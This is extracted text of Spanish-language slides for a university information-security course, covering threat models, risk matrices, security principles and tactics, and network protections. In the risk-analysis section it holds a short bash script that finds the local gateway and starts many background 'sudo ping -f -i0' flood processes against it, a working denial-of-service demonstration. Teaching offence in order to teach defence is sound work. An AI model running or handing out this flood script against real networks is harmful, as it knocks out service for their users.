Programa Sinóptico 03: Mejores Prácticas para la Seguridad de la Información

Prof. Miguel Torrealba S.(mtorrealba@usb.ve)

Enero 2018Coordinación del Programa Nacional de Formación Avanzada

Curso de Perfeccionamiento Profesional en:Seguridad de la Información

“La seguridad informática práctica es una sucesión de acciones y reacciones, de ataques y de defensas”.

Simson Garfinkel y Eugene Spafford (1999)

Lección #0: las mejores prácticas de seguridad no son la solución. Esa prácticas son recomendaciones genéricas, pero como tal no llegan a precisar las respuestas que demanda cada caso específico.

Una medida de protección si no va acompañada de una visión “holística” del problema y de su contexto particular, puede resultar inútil. O peor aún, puede proveer un falso sentido de seguridad.

Lección #1: No se debe creer que los instrumentos, técnicas y controles de seguridad son invulnerables.

Los fabricantes de sistemas de protección también deben colocar parches correctivos para repara sus productos. Incluso hay quienes se aprovechan de esa situación.

Lección #2: La respuesta es el Análisis de Riesgos. Esta técnica permite reconocer los principales riesgos que amenazan los activos de la información que se cuida.

Hoy en día, esta medida de seguridad tecnológica es anacrónica. Hace 50 años era muy útil, pero hoy en día las amenazas a los servicios de autenticación y control al acceso son más complejas y variadas.

“Principio de la Máxima Arrogancia: la facilidad para batir o derrotar un dispositivo o un sistema de seguridad, es proporcional a cuanta confianza o arrogancia tuvieron sobre el mismo el diseñador, el fabricante o el usuario final. O tambien es proporcional a cuan a menudo ellos usaron las palabras “imposible” y a “prueba de trampas”.”

Roger G. Johnston

“Los paradigmas cambian necesariamente cuando se comienza a cuestionar los fundamentos básicos de lo que hacemos en ese instante. Muchas creencias acerca de la seguridad de que los sistemas no fallarán y el porqué de muchos accidentes que han ocurrido, han sido ampliamente aceptados sin cuestionamiento.”

Nancy A. Levenson

Lección #3: Para hacer un Análisis de Riesgos primero es necesario disponer de un Modelo de Amenazas.

La formulación de un Modelo de Amenazas es un trabajo intelectual. Una tarea abstracta pero con sustento real donde la experiencia y conocimiento son de suma valor.

“De nuevo, no creo que usted pueda hacer una buena defensa sin comprender la ofensiva. No veo como pueda enseñar la defensa sin enseñar la ofensiva.”

Dorothy Denning

Si desconoces cómo suceden los daños y perjuicios informáticos resultará más difícil que puedas evitarlos.

La información está allí, disponible para cualquiera que realmente esté interesado en conocer cómo suceden las cosas.

Un punto de extrema importancia a considerar es cómo manejará usted la información acerca de la debilidad de los sistemas.

“Si usted piensa que la tecnología puede resolver sus problemas de seguridad, entonces usted no entiende los problemas y no entiende la tecnología.”

Bruce Schneier

Tema 1: Modelos de Amenazas

Amenaza (Threat): el potencial para comprometer, deliberada o accidentalmente, los objetivos principales de la seguridad.

Una amenaza no es igual que una vulnerabilidad (debilidad) ni un riesgo (probabilidad).

●

● Se acostumbra que los expertos definan la gravedad de la amenaza (niveles).

● Son ejemplos de amenazas un comando del sistema, una vulnerabilidad de software, un componente de malware, un descuido procedimental, una doctrina, un componente dañado, un incendio y una persona.

¿Es esto una amenaza? (objetivo, acción, lugar, fecha y hora)

¿Y esto también es una amenaza?

Que la CIA estadounidense pierda el control de una herramienta digital ¿es una amenaza?

Este trabajo académico ¿puede ser catalogado como una amenaza?

Un trabajador de confianza en el equipo de seguridad de la información ¿es una amenaza?

La Confianza es un elemento crítico en la seguridad

Una aproximación metódica para reconocer las amenazas a la información digital sobre un ambiente es guiarse por:

● Servicios de Seguridad (X.800 ITU-T):

●

● Autenticación.● Control de Acceso.● Confidencialidad.● Integridad.● Disponibilidad.● No Repudiación.● Anonimato.● Privacidad

Ejercicio #1: Identificar las amenazas informáticas al siguiente dispositivo de resguardo.

Ejercicio #2: Identificar las amenazas informáticas para un sistema del tipo SCADA/SCI.

Ya debes estar entendiendo la realidad de las amenazas a la información digital

A veces ayuda usar algún tipo de grafo para reconocer situaciones y ataques que podrían acontecer

Desde hace décadas existen técnicas para generar Árboles de Amenazas y Diagramas de Eventos.

Un Árbol de Amenazas es una técnica que permite identificar, ordenar y vincular peligros según cierto criterio.

● Diagramas de Transición y gráficas Causa-Efecto también pueden ser instrumentos lógicos que esclarezcan posibilidades.

●

● ¡La clave es no dejar nada relevante por fuera!

Ejercicio #3: ¿Puedes construir un Modelo de Amenazas para tu teléfono celular?

Tema 2: Análisis de Riesgos

Un Riesgo es la cuantificación o calificación de una amenaza.

●

● Aproximación Cuantitativa Básica:● Riesgo = Probabilidad

de que la amenaza se concrete x Impacto

del Daño

●

● Aproximación Cualitativa Simple:● (Muy Bajo, Leve, Moderado, Medio, Alto, Muy Alto,

Crítico).●

●

● Riesgo → Activar Medidas y Procedimientos●

● Para simplificar la comunicación en plantas, tableros y mensajes, se puede usar una escala de colores que deje más claro lo que cada sujeto debe hacer.

Una matriz de riesgos es un método muy común para sumarizar y representar los riesgos.

●

● Probabilidad (eje x) vs Impacto (eje y)

Los riesgos y las alertas son para ser consideradas, no ignorados.

Una medida o norma de seguridad debería responder a algún tipo de riesgo.

Algunas medidas de protección vienen de la fabrica, eso indica que otro ya pensó por usted.

El problema serio es cuando los profesionales creen que por esas medidas de protección su información y sistemas son invulnerables.

Recuerda que tu no sepas cómo o no puedas hacerlo no indica que más nadie está imposibilitado.

●

#!/bin/bash echo "prog_0.bash ejecutándose..." NRO_LINEAS=`netstat -r | wc -l` NRO_LINEAS=$((NRO_LINEAS - 2)) GATEWAY=`netstat -r | tail \`echo -$NRO_LINEAS\` | head -1 | awk '{print $2}'` echo -e "\nla máquina a alcanzar es: $GATEWAY \n" echo "Introduzca la cantidad de órdenes a ejecutar: " read COMANDOS ORDEN_0=`echo \`whereis ping | awk '{print $2}'\`` ORDEN_1=`echo \`whereis sudo | awk '{print $2}'\`` CONTADOR=0 while (( CONTADOR != COMANDOS )) do ((CONTADOR=CONTADOR+1)) echo "habilitando la orden $CONTADOR en el background..." exec `echo $ORDEN_1 $ORDEN_0 -f -i0 $GATEWAY` & done

Por eso insitimos en que no creas que todo lo que dice estar seguro, realmente lo está.

Paso 2

Paso 1

Paso 3

● De modo que una matriz de riesgos puede orientar la respuesta que habrá que producir.

Ejercicio #4: Expresar los riesgos informáticos en un dispositivo del tipo Conmutador de Red nivel capa 2

Tema 3: Protecciones Integrales y Holísticas de la información

Un ataque es cuando un riesgo se concreta.●

● Un control o protección de seguridad sirve para prevenir, mitigar, recuperar o bloquear un ataque.

●

● No hay protecciones para todos los ataques posibles.

Ejercicio #5: Discutir si un terremoto puede ser predecido científicamente.

● ¿Un terremoto puede ser un riesgo de pérdida de información?

Para proteger la información existen medidas y aproximaciones que pueden ser de utilidad.

●

● Así por ejemplo, para minimizar la posibilidad de sufrir pérdidas existen los esquemas de redundancia, es decir duplicarla y colocarla en otro sitio.

●

● El problema que surge con ese enfoque es que se refuerza la confiabilidad para disponer de ella, pero a la vez se debilita la confidencialidad o las restricciones de acceso de la misma.

●

● Y es que diseñar seguridad es un asunto de balancear ventajas contra desventajas, para buscar la mejor aproximación frente a ciertos requerimientos de un caso específico

No hay una receta universal. Existen modelos de defensa, aproximaciones lógicas, técnicas e instrumentos y procedimientos prácticos, pero decidir cuáles de ellos, cómo, dónde y por cuanto tiempo se usarán es un asunto de racionalidad humana. Para eso existen los profesionales del área.

El siguiente problema muestra como las medidas de seguridad pueden ser batidas con ingenio humano.

Falla con el protocolo de autenticación simple, durante el conflicto de finales del siglo XX en Angola y Sur África.

La debilidad del protocolo radicó en haber considerado con extrema simpleza que una respuesta cifrada y válida, también indica que quien la provee ha sido correctamente autenticado.

No hay medida de seguridad tecnológica contra la torpeza o estupidez humana. Eso se conoce como el problema del “factor humano” y por eso existe la “ingeniería social”.

Algunas de las medidas y aproximaciones de seguridad más comunes que se usan sobre la información son:

●

● Vigilarla → Emplear señuelos y sensores.● Hacerla confidencial → Cifrar.● Hacerla redundante → Duplicarla / Distribuirla.● Ocultarla → Canales Encubiertos / Esteganografía.● Confundir → Crear ruido / falsificar / Despistar.● Limitar su acceso → Colocar barreras que la restringen● (Esta última demanda identificar sujetos participantes)●

● Pero el gran problema sigue siendo almacenarla, transmitirla y removerla en modo seguro.

●

● Spectre y Meldow (Diciembre 2017)

El siguiente esquema de un marco lógico para analizar y diseñar en seguridad informática es producto del trabajo de M. Torrealba (2013)

Principios de la Seguridad / Inseguridad Digital:●

*.- Principio del daño fácil*.- Principio de la protección temporal*.- Principio del eslabón débil*.- Principio del menor privilegio*.- Principio de la separación de privilegios*.- Principio del estado seguro contra fallas*.- Principio de la aceptación económica de la protección*.- Principio de la aceptación del uso*.- Principio de la completa mediación*.- Principio de la autoridad concedida*.- Principio de la elongación y reducción del tiempo*.- Principio de la auditoría externa*.- Principio de la base de la confianza*.- Principio de la toma de decisiones distribuidas*.- Principio de la consolidación de la información*.- Principio de primero proteger al protector

Las estrategias más comunes son:

*.- Seguridad a través de la oscuridad

*.- Seguridad a través de una minoría

*.- Seguridad a través de la diversidad

*.- Seguridad a través de la revelación absoluta

*.- El costo como el elemento crítico

*.- El uso extendido como el elemento crítico

*.- La confidencialidad como el elemento crítico

*.- La velocidad de respuesta como el elemento crítico

*.- Maximizar el volumen de operaciones como el elemento crítico

*.- Mantener al sistema simple y fácil de usar y sostener

*.- Ejecutar las tareas pensando en que el peor caso sucederá

*.- La responsabilidad de la gestión y dictamen de la seguridad en

manpos de un grupo de expertos*.- La responsabilidad de la seguridad en manos de todos

Las Tácticas de seguridad más conocidas son:●

*.- La negación por omisión.

*.- Lo aprobado por omisión

*.- Enumerar cada peligro.

*.- Enumerar cada bien a resguardar.

*.- Acceso regulado por numerosas barreras.

*.- Usar señuelos.

*.- Simular debilidad o fortaleza que no son ciertas según convenga.

*.- Entregar algo para obtener otra cosa que más conviene.

*.- Pretender ir tras algo mientras se persigue otra cosa.

*.- Usar camuflaje.

*.- Copiar o clonar.

*.- Crear puntos de choque. Estos son puntos en los cuales confluyen todos los

caminos.

*.- Usar sumideros.

Tácticas de seguridad (cont):●

*.- Amenazar con continua vigilancia.

*.- Diseñar un sistema con ventajas ocultas o personalidades para usuarios

específicos.

*.- Ocultar los recursos y fortalezas reales.

*.- Usar una marea de información o ruido para confundir o despistar.

*.- Evitar la localización rígida de los controles de seguridad y de la supervisión

continua.

*.- Usar canales encubiertos.

*.- Incluir a otros en la misma situación para operar como un grupo homogéneo y

no una individualidad.

*.- Activar según indique el “conmutador del hombre muerto”.

*.- Usar la regla de “dos hombres” para controlar los accesos a los recursos

sensibles.

Tema 4: Protecciones Básicas de Sistemas

Protecciones en Sistemas (Stand Alone):●

*.- Protecciones Físicas del Sistema.*.- Protecciones por Hardware.*.- Protecciones del Sistema de Operación.*.- Protecciones de las Aplicaciones.

● Ejercicio #6: De ejemplos de cada una de las protecciones anteriormente señaladas.

● Ejercicio #7: Si a las 8:56pm usted se encuentra trabajando en la PC de Cibercafé y en la pantalla aparece este mensaje ¿que haría usted?

Con referencias a las protecciones, esto es lo que se dice:

Y se repite lo mismo una y otra vez:

Esto es lo que realmente se obtiene:

Para los que dudan de lo experimentado:

¿Y si es tan malo ese control por qué es el más usado?

¿Que hay de las protecciones de algunas aplicaciones famosas?

¿Cómo protegemos la confidencialidad de la información cuando existe este tipo de amenazas?

¿Por qué si los sistemas han madurado en su desarrollo, seguimos haciendo “ingeniería del parche correctivo”?

● Ejercicio #8: Explique por qué, si existen numerosas protecciones en un sistema, en promedio estos se la pasan infectados, comprometidos y expuestos.

“No importa cuantas leyes aprobemos, ni cuán buenas medidas de seguridad puedan surgir, estas no serán suficientes para tener sistemas completamente seguros. Necesitamos desarrollar y actuar de acuerdo a ciertos valores de la ética. Los miembros de la sociedad necesitan ser educados, de tal modo que comprendan la importancia de respetar la privacidad y la propiedad de los datos.”

Gene Spafford

Tema 5: Protecciones Básicas en Redes y Sistemas Distribuidos

Protecciones en Redes y Sistemas Distribuidos:

¿Cómo es que el gobierno más poderoso del planeta no pudo proteger sus cables diplomáticos?

¿Alguien o algún gobierno “hackeó” su red de transmisión con protecciones cibernéticas de gradomilitar?

¿Esta gente no pudo instalar un Firewall y un IDS?

¿Cómo es que 2 tercios de un país se quedan a oscuras en 2015 y en el aniversario -un año después- su capital vuelve a sufrir un apagón por horas?

¿Qué pasa con IoT?

Así de grave está la cosa con IoT y la Internet ...

● Ejercicio #9: Analice la protección del intercambio de tráfico en RIP versión 2 ¿qué le parece?

Tema 6: Asignación del Proyecto de Curso